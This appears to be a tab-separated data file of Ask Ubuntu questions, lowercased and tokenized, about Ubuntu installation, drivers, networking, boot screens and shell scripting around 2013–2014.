399864	how do i get out of purple boot screen while installing ubuntu on an imac intel core i7 haswell 2013 ?	for the last couple of days i have been trying to install but most importantly run ubuntu 13.04 and 13.10 on my intel core i7 haswell imac model ( late 2013 ) . unfortunately i have n't been able to boot into the system itself . the installation was nice and easy , but as soon as i restart my computer i am stuck at a purple boot screen . now i do n't know if i have done anything wrong or if this is related to a hardware issue/the imac itself . does linux support intel haswell chipsets at the moment ? or is this an apple/mac specific problem ? here is how i installed ubuntu on my new imac : i installed refind boot manager in os x 10.8.5 . created a bootable ubuntu usb thumb drive . in the installer , i created 3 partitions , 1 for swap 8 gb , 1 for the bios 10 mb ( i also tried efi ) but the result is the same and 1 for ext4 850gb . ran the install and waited until it fished . once everything was successfully installed i was asked to restart my computer . and that 's about it really , from there on i can not boot , i 'm stuck at the purple screen . my computer specifications are as follows : imac ( late 2013 ) 3.1ghz quad-core intel core i7 haswell , turbo boost up to 3.9ghz 16gb 1600mhz ddr3 sdram memory 1tb serial ata drive @ 5400 rpm nvidia geforce gt 750m 1gb gddr5 any information would be greatly appreciated .
399867	how do i make a plymouth sprite rotate ?	i 'm working on a custom plymouth splash for kubuntu 13.10 . it consists of an image that 's centered on the screen and rotates . i 've tested the splash with both restarts and an x11 plugin , but my splash is n't working properly . here 's my script as it is now : spiral_image = image ( `` splash.png '' ) ; spiral_sprite = sprite ( spiral_image ) ; spiral_sprite.setx ( window.getwidth ( ) /2 - spiral_image.getwidth ( ) /2 ) ; spiral_sprite.sety ( window.getheight ( ) /2 - spiral_image.getheight ( ) /2 ) ; time = 0 ; fun refresh_callback ( ) { time++ ; angle = math.pi*time ; spiral_sprite.setimage ( spiral_image.rotate ( angle ) ) ; } plymouth.setrefreshfunction ( refresh_callback ) ; here is my plymouth file as it is now : [ plymouth theme ] name=iris splash modulename=script [ script ] imagedir=/lib/plymouth/themes/iris scriptfile=/lib/plymouth/themes/iris/iris.script i 'm not certain as to what i 'm doing wrong , so any help would be appreciated .
399876	weird characters in gmusicbrowser xubuntu 13.10	one problem . when the shimmer desktop theme in gmusicbrowser in xubuntu 13.10 , i have weird characters like the letter a acting as separators between artist , year and album . any idea what could i do about it to make it look normal ?
399877	hdmi not detected after update in ubuntu 13.10	i 'm running ubuntu 13.10 and for some reason when i restarted my computer my hdmi stopped being recognized . what 's going on and how do i fix this ? here 's my output with lspci -v -s 00:02.0 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 2111 flags : bus master , fast devsel , latency 0 , irq 44 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 and xrandr output : screen 0 : minimum 320 x 200 , current 1680 x 1050 , maximum 32767 x 32767 vga1 connected primary 1680x1050+0+0 ( normal left inverted right x axis y axis ) 430mm x 270mm 1680x1050 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) hdmi is not disconnected and should be read . going into displays i do not see the second screen . i have seen multiple issue tracking on this but have not managed to solve it yet . hdmi stopped working ubuntu 13.04 it seems like a video card problem but i would have suspected that i would have noticed this before not now . maybe this has to do with the ubuntu update that i made before the restart ? ? ? i 'm adding the specs of my motherboard below . i am using the integrated graphics card . description : desktop computer product : ms-7758 ( to be filled by o.e.m . ) vendor : msi version : 1.0 serial : to be filled by o.e.m . width : 32 bits capabilities : smbios-2.7 dmi-2.7 smp-1.4 smp configuration : boot=normal chassis=desktop cpus=4 family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00000000-0000-0000-0000-d43d7e921319 *-core description : motherboard product : z77a-g43 ( ms-7758 ) vendor : msi physical id : 0 version : 1.0 serial : to be filled by o.e.m . slot : to be filled by o.e.m . *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : v2.7 date : 10/24/2012 size : 64kib capacity : 8128kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification uefi
399883	sublime text - no shortcuts working on non-latin layout , 12.04	i have fresh ubuntu 12.04 and sublime text 2 installation . there are two keyboard layouts : english and russian . if i switch on russian one : no shortcuts are working , ctrl+z , ctrl+p and so on . however , it works well on english layout . i have noticed strange behaviour : if i switch window focus to another application : it starts working ! of course i can remap all key bindings to russian letters ( but it is headache ! ) . i am sure that it is some bug , or program conflict . what could be the problem ?
399884	wine or photoshop cs6 error	photoshop hataları yaşıyorum yardımcı olursanız sevinirim ileri derecede ingilizce bilmiyorum çeviri yapabilirim . translated in english through http : //translate.google.com/ . `` i 'm glad if you help photoshop errors highly do i do not know english translation . '' the error massage text is could not complete your request because something prevented the text engine from being initialize . and it look like this http : //i.imgur.com/lrxwxdf.png
399887	mts mblaze not installing un ubuntu 13.10	hi i am using mts mblaze modem wuth a tata photon+ sim card in it . it works perfectly on windows 7 but when i connec t to ubuntu 13.10 nothing happens . i tried to configure vpn and also checked the option 'connect automatically when available ' but nothing happened . it tried to connect once but failed . help me please . my username and password were correct and it works on windows 7 without problem .
399888	css plugin for eclipse pdt	i want css plugin for eclipse pdt ? so that when i apply style to any html element , intellicense shoud appear with options .
399889	should i update via software updater after upgrading kernel ?	i have installed too much time ago kernel version 3.12.4-031204-generic from 3.11.0 and it works fine ... however , software-updater gets me updates for kernel 3.11 ... should i get these updates and or just ignore them ? but accepting these updates would mean me going back to kernel 3.11 ... what should i do ? and is there any way to put software updater get me updates for 3.12.4 ? i am aware of the dist-upgrade command so please dont't write about it ... thank you all in advance !
399891	problems after xampp install via xampp-linux-1.8.3-2-installer.run	i just installed xampp via xampp-linux-1.8.3-2-installer.run on ubuntu 12.04 . it required root access , so i used sudo bash . now the option to re-open recently closed tabs stopped working on all browsers . firefox 's pin tab option also stopped working . is there a way to fix this ? thanks
399894	file rating in folder	i wonder if there 's a posibility to rate files ( especially sound files ) in folder with list view in rating column . i 've used this feature in win 7 and it 's probably only thing i miss . i 'm not looking for music player which can do that . i would like to change rating in folder .
399896	are al aspire one netbooks certified ?	i was wondering if al aspire one netbooks are certified and wil work perfect with ubuntu ? i was thinking to buy an aspire one second hand and a 12 cell battery and then run ubuntu on it .
399899	e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ?	i installed lamp using the command sudo apt-get install lamp-server^ . after that whenever i open the terminal the following error appears : bash : /home/gaja/.bashrccu : no such file or directory bash : /home/gaja/.bashrc : line 4 : syntax error near unexpected token ( ' bash : /home/gaja/.bashrc : line 4 : see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) ' gaja @ gaja-system-product-name : ~ $ also i could n't install any thing using sudo apt-get command . this is my problem .
399903	unattended phpmyadmin install end up throwing errors	i 'm trying to install phpmyadmin preseeding the information via the debconf-set-selection command on my ubuntu 12.04lts that 's the bit i 'm using echo phpmyadmin phpmyadmin/dbconfig-install boolean true | debconf-set-selections echo phpmyadmin phpmyadmin/app-password-confirm password pwd | debconf-set-selections echo phpmyadmin phpmyadmin/mysql/admin-pass password pwd| debconf-set-selections echo phpmyadmin phpmyadmin/mysql/app-pass password pwd| debconf-set-selections echo phpmyadmin phpmyadmin/reconfigure-webserver multiselect apache2 | debconf-set-selections echo phpmyadmin phpmyadmin/upgrade-backup boolean true | debconf-set-selections but i always end up getting the following error message error : can not find a question for phpmyadmin/dbconfig-install error : can not find a question for phpmyadmin/app-password-confirm error : can not find a question for phpmyadmin/mysql/admin-pass error : can not find a question for phpmyadmin/mysql/app-pass error : can not find a question for phpmyadmin/upgrade-backup if i attempt to run the command using sudo from the shell i get the following message debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : permission denied however , i was once able to get this installed . so what could be the cause ? thanks andrea
399904	rsync has been interrupted - copy from beginning	i was using rsync to copy files from one pc tp another . and the 'remote ' pc stopped working , so i had to restart . now , how can i use rsync in order not to copy all the files again from the beginning . if i use -- ignore-existing ? note , that one file for example which was 10mb , maybe be copied to the remote , but only part of it ( for example 5mb ) . how can i use rsync to copy the rest of these files ?
399914	openstack instanses ca n't accept floating ip	hello when i create an instance in openstack dashboard and try to allocate an ip address i see : error : 404- { u'neutronerror ' : { u'message ' : u'external network a522b82c-7640-4108-8bdb-72e6218aace7 is not reachable from subnet ce361cbe-9e1b-46a3-aa27-5ab6e757cf82 . therefore , can not associate port b8caff6b-e2cc-4a1f-8cb3-bf06c583ea8b with a floating ip . ' , u'type ' : u'externalgatewayforfloatingipnotfound ' , u'detail ' : u '' } } ă error : unable to associate ip address 192.168.1.138 . i have one maas server and two nodes in it . my network is : 213.149.x.x == > 192.168.1.1 == > 192.168.50.1 == > maas + node + node can you give me an advice how should my network toplogy look like ? thanks !
399916	ca n't install ubuntu 13.10 with windows 8.1 64x dual boot	my system have windows 8.1 64x pro and i also wanted to install ubuntu on it . i tried to install the ubuntu wubi 12.04 and also tried to install with ubuntu 13.10 amd64.iso image it says unable to install bool loader so you ca n't boot linux ubuntu .
399917	no wifi all of a sudden	my wifi had been working fine , until 21:30 last night . from the logs it looks like it started to cycle connect/disconnect multiple times each minute , and then this morning it does n't even appear to be trying to connect . the cycle in kern.log looked like : [ 38374.378692 ] userif-2 : sent link down event . [ 38374.378704 ] userif-2 : sent link up event. < 7 > [ 38374.681807 ] bridge-wlan0 : disabling the bridge on dev down [ 38374.681841 ] bridge-wlan0 : down [ 38374.681855 ] bridge-wlan0 : detached [ 38374.689787 ] cfg80211 : calling crda to update world regulatory domain [ 38374.881435 ] userif-2 : sent link down event . [ 38374.881444 ] userif-2 : sent link up event. < 6 > [ 38375.530786 ] wlan0 : authenticate with e0 : a1 : d7 : d6 : c3 : b4 [ 38375.531764 ] wlan0 : send auth to e0 : a1 : d7 : d6 : c3 : b4 ( try 1/3 ) [ 38375.533650 ] wlan0 : authenticated [ 38375.536171 ] wlan0 : associate with e0 : a1 : d7 : d6 : c3 : b4 ( try 1/3 ) [ 38375.542840 ] wlan0 : rx assocresp from e0 : a1 : d7 : d6 : c3 : b4 ( capab=0x11 status=0 aid=1 ) [ 38375.543974 ] wlan0 : associated [ 38375.595428 ] /dev/vmnet : open called by pid 1518 ( vmnet-bridge ) [ 38375.595454 ] /dev/vmnet : hub 0 does not exist , allocating memory . [ 38375.595488 ] /dev/vmnet : port on hub 0 successfully opened [ 38375.595508 ] bridge-wlan0 : device is wireless , enabling smac [ 38375.595513 ] bridge-wlan0 : up [ 38375.595553 ] bridge-wlan0 : attached and in syslog : ctrl-event-disconnected bssid=e0 : a1 : d7 : d6 : c3 : b4 reason=4 this morning , upon boot-up it appears the iwlwifi module is now not loaded anymore , but adding it with modprobe iwlwifi did n't seem to help matters . lshw -c network shows wireless as *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0600000-f0601fff and iwconfig : eth0 no wireless extensions . lo no wireless extensions .
399918	how to type english phonetic scripts ?	how to type english phonetic scripts used by daniel jones ? these useful scripts are not given in keyboard layout in ubuntu . can i add it / copy & paste from anywhere ?
399920	no dom0 in `` virsh list ''	basically i am trying to setup a cloud with ubuntu 12.04 , eucalyptus and xen . i have installed xen . now when i run xm list command , it shows domain-0 is running . but when i try with virsh list , nothing is populated . even virsh list -- all does not produce any output . how to solve this problem ?
399921	how do i play cd games with ubuntu ?	i have got 3 games that i really want to play on ubuntu , but i do n't know how to get them working . so i recently found three games on cds that i wan na play , when i put the disc in the cd-rom a cd mark appears in the launcher tab , i click on it and then the home folder appears with all the folders and items that are in the cd . when i right click on setup.exe ( i 'm aware that i can open games by going into permissions in properties and allowing executing file as a program , but it says `` sorry , could not change the permissions of `` setup.exe '' : error setting permissions : read-only file system '' ) and open it with wine windows program loader , nothing happens . if it helps the games that i 'm trying to install are `` command & conquer red alert 2 '' , `` city life '' and `` theme hospital '' . i 'm aware of terminal as well but i do n't know how to use it very well ... please help .
399925	wget unable to resolve host address 'www . '	this is the first time i use wget so please bear with me . i have flareget installed on my ubuntu , but i decided to try the famous wget . i have no when using flareget , but my wget is not working . i was trying to download a movie from putlocker , it could be downloaded from flareget but not wget . this is the error on the terminal : http request sent , awaiting response ... 301 moved permanently resolving www . ( www. ) ... failed : name or service not known . wget : unable to resolve host address âwww.â and this is the movie 's url in case it has any effect : http : //media-b158.putlocker.com/download/15/64/42195d9d2e746f82cecd4eaebe80e0be ? h=v0_gbttggznsjemi0t4y5a & e=1388834376 & f=ipman.sidofi.com.mkv.rar & domain=putlocker.com i do not use the hyperlink because i think you just want to see the url , and the url seems only working on my ip . any help is appreciated , thanks for your help .
399929	shell script while statement	i am making a script ( for educational purposes ) but i am kind of stuck here.. the program asks for an existing filename and checks if the filename actually exists . if it does n't the loop repeats itself until you fill in a file that does exist . so far so good ! but when you enter a filename that does exist i want the script to enter the next while loop , to enter the path file.. but it does n't continue . how can i make enter the next while statement ? ? ? clear echo `` your filesystem is threatned , files should be moved in order to guarantee safety ! ! ! ! '' while read file do if [ -f $ file ] ; then echo `` file is safe to secure '' else echo `` too late , we lost the file , safe another ! '' fi done echo `` time is running out , we must secure this file inmidiately , quick give me a safe location ! '' while read path do if [ -d $ path ] & & [ -f $ file ] ; then echo `` the location is secure ! move the file ! '' else echo `` either the file or the safehouse is corrupt , quick try again ! '' fi done
399934	dual-boot ubuntu on an asus x551ca laptop ( windows 8.1 )	i bought an asus x551ca laptop for my son which came with win8 installed ( now updated to win8.1 ) . i want him to be able to dual-boot to ubuntu as we use 12.04 on our desktop and he likes apps like openshot & rosegarden , but he needs windows for some of the school work he does . i initially had a similar issue to this post - managed to get the ubuntu live cd ( 12.04.3 64-bit ) to boot from usb after disabling secure boot etc , but for some reason after selecting the language when i try to install ubuntu it reboots , taking me back to the beginning . same happens if i select the option to try ubuntu without installing . the laptop came with 3 partitions on the single hdd : rescue , os ( windows ) , and data . i shrank data to allow me to create a 4th ( 50gb ) partition for ubuntu ... but does ubuntu need more than 1 partition ( eg for grub ? ) , and is this causing the reboot issue ? my plan was to mount the data partition in ubuntu so he could access the files from both windows or ubuntu . i 'm conscious there may be an issue with ubuntu 13.04 on this laptop - see this post - but i am not replacing windows with ubuntu , i want to run them both side by side , and am using the lts release , so am hoping the asus synaptics/elantech touchpad bug will not apply ... any ideas greatly appreciated on how to get around this reboot issue when trying to install , and also if i can expect any issues running 12.04.3 on this hardware ? update : this is not an duplicate of installing ubuntu on a pre-installed windows 8 64-bit system uefi supported ( which is a great guide ) , as i am able to boot from the liveusb - the issue is that the ubuntu installation reboots as soon as i select the install option from the installation menu . i have managed to sort out the bios/eufi/secureboot and legacy support issues , the issue now seems to be one of the installation itself .
399937	ctrl+alt+f1 does not give me the command console,13.10 , how can i switch to this console ?	i need to change my graphics driver , and need to stop xserver to do this , and clearly i can not do this from terminal . i want to enter command console ( ie non graphic mode ) trying to boot into it just causes my system to crash , and for reasons unknownn my version of ubuntu does not have the shortcut ctrl+alt+f1 can anyone tell me how to do this please . thanks
399941	opengl not working on ubuntu 13.10	i am trying to make runescape work using opengl.i am using chrome like it told me to ( i did also try firefox when it did not work though ) and it thinks that my graphics card is outdated . i googled it for awhile but did not find much , but what seemed to be important was the graphics card version.i have nvidia geforce 9500 gs.any ideas ?
399944	dual boot 8.1 with ubuntu 14.04	im looking for some help with dual booting my acer aspire v5-122p with ubuntu 14.04 as ive normally just gone full linux ive never tried to dual boot before , i have looked at some guides but most of them are lacking in what to do properly . what would be your advice to do this ?
399946	usb audio dongle for ubuntu 13.10	i just converted another user to ubuntu , but unfortunately her onboard sound is currently non-functioning due to a long standing bug , so i 'm hoping someone can suggest a cheap usb audio dongle that is known to work with 13.10 . i 'd get the penguin one , but it 's a bit on the expensive side for only casual use , especially considering most can be had for a couple of quid . thanks in advance .
399947	how to get system call numbers in ubuntu 12.04	i am reading the book operating system concepts . on page number 94 ( in 8th edition ) , the author talks about system call numbers , and gives the location of the file where we can get this number : /usr/src/linux-headers-3.8.0-29/include/asm-generic/unistd.h but its contents are like this : # include < uapi/asm-generic/unistd.h > /* * these are required system calls , we should * invert the logic eventually and let them * be selected by default . */ # if __bits_per_long == 32 # define __arch_want_stat64 # define __arch_want_sys_llseek # endif # define __arch_want_sys_rt_sigaction # define __arch_want_sys_rt_sigsuspend # define __arch_want_compat_sys_rt_sigsuspend /* * `` conditional '' syscalls * * what we want is __attribute__ ( ( weak , alias ( `` sys_ni_syscall '' ) ) ) , * but it does n't work on all toolchains , so we just do it by hand */ # ifndef cond_syscall # define cond_syscall ( x ) asm ( `` .weak\t '' # x `` \n\t.set\t '' # x `` , sys_ni_syscall '' ) # endif where are those system call numbers ? and where are those system calls ( i guess these are many , as given in o.s book by galvin ) , i just see some macros and only one function cond_syscall ( x ) . kindly help me in understanding this . the version of the kernel is ; 3.8.0-29-generic
399948	`` stderr=the boot configuration data store could not be opened . '' using bcdedit	i just wanted to take a look at a linux os without any hassle of disk partitioning and boot file problems . wubi will not install after multiple attempts . any idea wht is wrong or how i can fix it please ? it says check the log file ... ..command=c : \windows\sysnative\bcdedit.exe /create /d ubuntu /application bootsector retval=1 stderr=the boot configuration data store could not be opened . the system can not find the file specified .
399949	ubuntu 13.04 dimming screen flickering	when ubuntu goes to sleep , the screen dims slowly before turning off . as it is doing this , about every second , the screen flashes back to maximum brightness before returning to dimming . my graphics card is an nvidia 7900gs and i am using the nvidia-304 driver . help would be appreciated .
399950	how to identify a pop up and kill it	saucy salam i see a boring popup that states that `` computer will suspend very soon because of inactivity . '' when i log back to my desktop after it went to sleep . i would like to try to write some program that make this popup to automatically disappear as soon as i log in , but i do n't know how to identify this small window . i tried to diff the outputs of sudo ps ax with & w/o the popup displayed but this shows no difference . thank you for advises btw , i already read this bug : https : //bugs.launchpad.net/ubuntu/+source/gnome-settings-daemon/+bug/1232454 .
399951	unzip all zip files in a target folder ?	i have a curl cronjob which periodically downloads a bunch of zip files into a target folder . like this : curl www.zipdownloadfile.com/file.zip > file.zip now i need to have ubuntu unzip all of the zip files in that target folder . what 's the proper command which will unzip all of the files in a target destination/folder ? thanks
399952	both lan and wifi not working	i installed ubuntu 12.04 on my recently purchased toshiba satellite but both wired and wireless are not working . i tried fedora 19 64 bit but it works perfect . how can i use ubuntu then . is there any method you can forward . i also heard about clonzila . can i make an installed copy of ubuntu from any other sytems ( which is having lan ) . please help me geeks ...
399954	which processes with daemon are unnecessary ?	i saw 3 processes which have `` daemon.py '' at the end of them and use 10 mb of memory each of them . what do they make ? also there are a lot of processes which have daemon inside . are they really necessary and is it safe to stop/remove some of them ? if yes , how can i stop them permanently ? my current processes which have daemon inside in 13.10 : bamfdaemon dbus-daemon gnome-keyring-daemon gnome-settings-daemon ibus-daemon ubuntu-syncdaemon unity_facebook_daemon.py unity-files-daemon unity_flickr_daemon.py unity-music-daemon unity_picasa_daemon.py unity_shotwell_daemon.py unity-video-lens-daemon zeitgeist-daemon
399955	how to make a command execuitable without root previlages ?	i want to make some commands , such as ntpdate , shutdown etc , to execute without asking me for a password or without using `` sudo '' for `` all users '' ( even normal users who have no sudo privileges ) . i want only a few commends to behave in such way and not every command . any idea how to archive this ?
399956	how to fix : unity not working at all ( updates , upgrade , drivers , opengl ) ?	recently i got stuck with unity since it does not work at all - i see no system bar nor unity launcher ( 3d/2d ) . possible causes are : system update/upgrade or playing with drivers ( additional fglrx or downloaded from amd website ) . i would point on recent system update since i saw there opengl-something . edit how have i reanimated unity : first reading askubuntu and google answers - reinstalled unity , - changed drivers , then reading unity -- reset - fixed broken links to libgl.so and added few more , then reading answers - enabled unity in ccsm then reading unity -- reset - added libatiuki.so links to /lib32 and /lib ( was only in /lib64 ) . now it kind of works , but unity -- reset ( below ) tells another story . i 'd be glad to know how to fix those errors : warning : unity currently default profile , so switching to metacity while resetting the values checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x2400004 compiz ( core ) - warn : failed to receive configurenotify event on 0x1400002 compiz ( core ) - warn : failed to receive configurenotify event on 0x1600002 compiz ( core ) - warn : failed to receive configurenotify event on 0x40000dd initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:5391 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed error subscribing to gestures warn 2014-01-04 16:14:47 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported x error of failed request : badaccess ( attempt to access private resource denied ) major opcode of failed request : 33 ( x_grabkey ) serial number of failed request : 6214 current serial number in output stream : 6460
399958	bash : /home/gaja/.bashrc : line 4 : syntax error near unexpected token ` ( '	when i open the terminal i got the following the errors . bash : /home/gaja/.bashrccu : no such file or directory bash : /home/gaja/.bashrc : line 4 : syntax error near unexpected token ( ' bash : /home/gaja/.bashrc : line 4 : see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) '
399959	leap motion technology	does ubuntu support leap motion technology : https : //www.leapmotion.com/ ? i think it 's the best alternative to future ui . it 's accurate by 1/100mm , better thank kinect .
399965	failed to fetch http : //ppa.launchpad.com 404 not found	i am a newbie , so i ca n't explain my problem using the proper terminology . all i know is that , every time i open the terminal and type the command line sudo apt-get update , i get a certain error just before the end . it is about an ppa related to gimp . you can see the error in the imagine below . does enyone know how can i get read of it ? i suppose i need a command line for this , but , being new to linux , i just do n't know how or what should i type . thank you in advance for your help !
399967	lx games session ?	i am running lubuntu 13.10 , and i have discovered a new session named `` lx games '' . when i run it , i can only see my desktop and cairo-dock ( which i added to autostart ) . can sombody tell me what lx games is for and how to configure it ? i havent found anything useful yet .
399968	resize ubuntu partition to install windows alongside	i wanted to install ubuntu alongside windows but it formatted the disk completely , now i want to install windows alongside ubuntu , above is the link to present status of harddisk ( gparted ) please help me how to resize the partition and install windows , i am a complete newbie to linux/ubuntu as such .
399974	how can i switch directly to a workspace using the keyboard ?	how can i set up a keybinding to jump directly to a workspace ? i.e . if i 'm on workspace 4 , and i know my editor is ( always by personal convention ) on workspace 2 , i want to just hit super-2 to jump straight there instead of having to think `` ok , that 's two workspaces to the left , i need to do super-left twice '' . more generally , i am trying to get compiz to behave more like a tiling window manager using minimally invasive things like custom keybindings ; this is just where i 'm starting ...
399976	dell inspiron 5010 overheating issue ubuntu 12.04	i know this is a duplicate question . but none of the solutions provided for the previous questions worked for me . my laptop comes with a 1gb ati graphics card . the laptop overheats even when it is idle . when i run eclipse with adt i can even prepare an omelet on it . i have removed the xorg driver and installed fglrx form ati site but still the problem persists . any solution will be greatly appreciated .
399981	problem with routing over vpn / slow connection	i have some weird issues with my connection over vpn and i narrowed it down to being related to my home network & os . i am using shrew soft vpn to connect to the vpn and it connects properly but the speed is just ridiculously slow ( 0.3 k/s ) . i am able to ping the hosts , i am able to ssh to machines in the internal network but the speed is the buzz kill . i tried the exact same configuration with my laptop from various networks and it all works perfectly , i only have this issue at home . more interesting is that running the vpn client under windows works normally , with normal speed and what not , i only encounter these issues on ubuntu and linux mint . quick facts : able to connect to vpn able to ssh to internal servers through vpn able to load a webpage over vpn , just really really slow works normally in a different network setup , not my home network works normally from my home network under windows , not under ubuntu / linux mint ping responses are normal ( 25 ms ) but they come in really slow under ubuntu network setup : modem cable dhcp on 192.168.0 . * router gets ip from modem cable and dhcp 's to all hosts on 192.168.1 . * ip routes before vpn connection : default via 192.168.1.1 dev eth0 proto static 169.254.0.0/16 dev eth0 scope link metric 1000 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.123 metric 1 route -n : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 ip route of the router : destination gateway genmask flags metric ref use iface 192.168.0.1 * 255.255.255.255 uh 0 0 0 wan 192.168.1.0 * 255.255.255.0 u 0 0 0 lan 192.168.0.0 * 255.255.255.0 u 0 0 0 wan default 192.168.0.1 0.0.0.0 ug 0 0 0 wan route -n after connection : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.100.252 0.0.0.0 ug 0 0 0 tap0 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 82.x.x.x 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.100.0 0.0.0.0 255.255.255.0 u 0 0 0 tap0 ip route after vpn connection : default via 192.168.100.252 dev tap0 proto static default via 192.168.1.1 dev eth0 proto static 82.x.x.x via 192.168.1.1 dev eth0 proto static 169.254.0.0/16 dev eth0 scope link metric 1000 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.123 metric 1 192.168.100.0/24 dev tap0 proto kernel scope link src 192.168.100.252 resolv.conf after connection : domain nameserver 10.xx.xx.xx -- valid dns ip thank you .
399985	`` the following signatures were invalid : badsig 16126d3a3e5c1192 ''	i am new to ubuntu and i just installed it . when i tried to install git using `` apt-get install git '' i received error with `` unable to connect '' . then i found this question and did as what the question said . i installed git without any problem ( i also installed vim and postgresql , no problem ) . but i received the following the error when i do `` apt-get update '' . w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > then i replaced the sources.list with the original one -- the previous one when i had problem using apt-get install . and the strange thing is that i can use apt-get install ( all i did was just stop using the list file and used another one and then revert to the original one and the original one suddenly works for install ) i still have the same error with update . so what was wrong previously ? why did i receive error now ?
399992	is there a command to open system monitor ?	as stated above , is there a command to open system monitor ? using ubuntu 12.04 lts
399997	mpi file not recognized ?	i am trying to compile some mpi files on ubuntu i installed the library using this code sudo apt-get install libcr-dev mpich2 mpich2-doc and tried to compile this simple hello world program /* c example */ # include < mpi.h > # include < stdio.h > int main ( int argc , char* argv [ ] ) { int rank , size ; mpi_init ( & argc , & argv ) ; /* starts mpi */ mpi_comm_rank ( mpi_comm_world , & rank ) ; /* get current process id */ mpi_comm_size ( mpi_comm_world , & size ) ; /* get number of processes */ printf ( `` hello world from process % d of % dn '' , rank , size ) ; mpi_finalize ( ) ; return 0 ; } the hello file is on the desktop i used this command mpicc mpi_hello.c -o hello as you can see the library is well installed yet i ca n't seem to compile any program , reading state information ... done libcr-dev is already the newest version . mpich2 is already the newest version . mpich2-doc is already the newest version . here is the error i keep getting for any mpi program i try and compile gcc : error : mpi_hello.c : no such file or directory
400000	uget queque not auto-downloading	im experimenting with some download manager on ubuntu , and i think uget + aria2 is very good in term of speed . so i decided to make a queque and download those file using uget , with aria2 plugin enabled . however , the queque is not auto-downloading , which means the download will be stopped after a file finished . it should go to the next download automatically . note : what i want is to download a queque one by one ( so i change the active download to 1 , 1 file at a time ) , not download them all at the same time . any help is appreciated , thanks a lot : d
400003	how to change color balance of the monitor	i 'd like to change the default ( white ) color on my laptop display . right now the color is too blue-like , the best comparison i can make is that it emits color similar to xenon lights on cars . i have tried to use gnome-color-manager , but it only shows the light curves , it does n't allow any modification , except for loading the icm profile . i do n't have any calibration hardware , but since i do n't use this machine for graphic design i do n't care if the colors are correct , i just do n't want them to be xenony . it tires my eyes . i also tried to use redshift , but it only changes the gamma , i tried lprof but got reaally confused by the gui : ) i just need some kind of slider where i could change the color balances just like in some gimp , not only for the image but for the entire display . external big displays usually have some buttons to set this , but it is not available on my laptop . thank you so much !
400006	the screen is dark when start	i have just installed ubuntu12.04 desktop on my computer . now it has the following problem : every time when i start my computer , when the boot menu passed by , the screen will turn to be so dark that i ca n't see any thing if i do n't adjust the brightness . i am tired of adjusting brightness at every start up . is that hardware problems ? is there any manner to avoid that ? thanks !
400008	mouse disappears upon installing graphics cards	this is the second time this has happened , on two fresh installs . ubuntu v13.10 amd64 . these are the first and only lines of code it took to kill the mouse each time : sudo apt-get install fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev sudo aticonfig -- lsa sudo aticonfig -- adapter=all -- initial sudo reboot its still there , shows and works on black screen during boot . then pops up to top left corner , then stops working . its 5ea radeon 7850 's and 2ea r9 280x cards ( 7 cards total ) on the same build , obviously has something to do with it . i have searched , to no avail , to find a way or example line of code to run to fix the proposed `` since you have all those cards , another desktop is probably created and your mouse is floating around that one '' theory . help is 100 % appreciated ! ! !
